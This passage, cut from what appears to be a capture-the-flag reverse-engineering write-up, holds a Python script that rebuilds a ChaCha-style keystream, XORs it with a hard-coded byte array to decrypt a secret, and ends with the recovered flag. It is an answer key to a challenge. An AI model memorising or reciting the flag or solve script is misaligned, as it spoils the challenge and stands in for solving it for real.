4), _get32(iv, 8)] _keystream = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] _byteCounter = 0 def _rotl(num, e): return (num << e | num >> 32 - e) & 0xffffffff def _quarterround(t, e, n, r, o): print(t) 
t[e] += t[n] t[e] &= 0xffffffff t[o] = _rotl(t[o] ^ t[e], 16) t[r] += t[o] t[r] &= 0xffffffff t[n] = _rotl(t[n] ^ t[r], 12) t[e] += t[n] t[e] &= 0xffffffff t[o] = _rotl(t[o] ^ t[e], 8) t[r] += t[o] t[r] &= 0xffffffff t[n] = _rotl(t[n] ^ t[r], 7) t[e] >>= 0 t[n] >>= 0 t[r] >>= 0 t[o] >>= 0 return t def encrypt(t): return _update(t) def decrypt(t): return _update(t) def _chacha(): n = 0 t = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] for i in range(16): t[i] = _param[i] for i in range(0, _rounds, 2): t = _quarterround(t, 0, 4, 8, 12) t = _quarterround(t, 1, 5, 9, 13) t = _quarterround(t, 2, 6, 10, 14) t = _quarterround(t, 3, 7, 11, 15) t = _quarterround(t, 0, 5, 10, 15) t = _quarterround(t, 1, 6, 11, 12) t = _quarterround(t, 2, 7, 8, 13) t = _quarterround(t, 3, 4, 9, 14) for e in range(16): t[e] += _param[e] _keystream[n] = 255 & t[e] n += 1 _keystream[n] = t[e] >> 8 & 255 n += 1 _keystream[n] = t[e] >> 16 & 255 n += 1 _keystream[n] = t[e] >> 24 & 255 n += 1 print(_keystream) return _keystream key = _chacha() cmp = [34, 69, 86, 242, 93, 72, 134, 226, 42, 138, 112, 56, 189, 53, 77, 178, 223, 76, 78, 221, 63, 40, 86, 231, 121, 29, 154, 189, 204, 243, 205, 44, 141, 100, 13, 164, 35, 123] cmp = [102 ^ cmp[_] ^ key[_] for _ in range(len(cmp))] print(bytes(cmp)) ``` FLAG :flag{59ec211c0695979db6ca4674fd2a9aa7}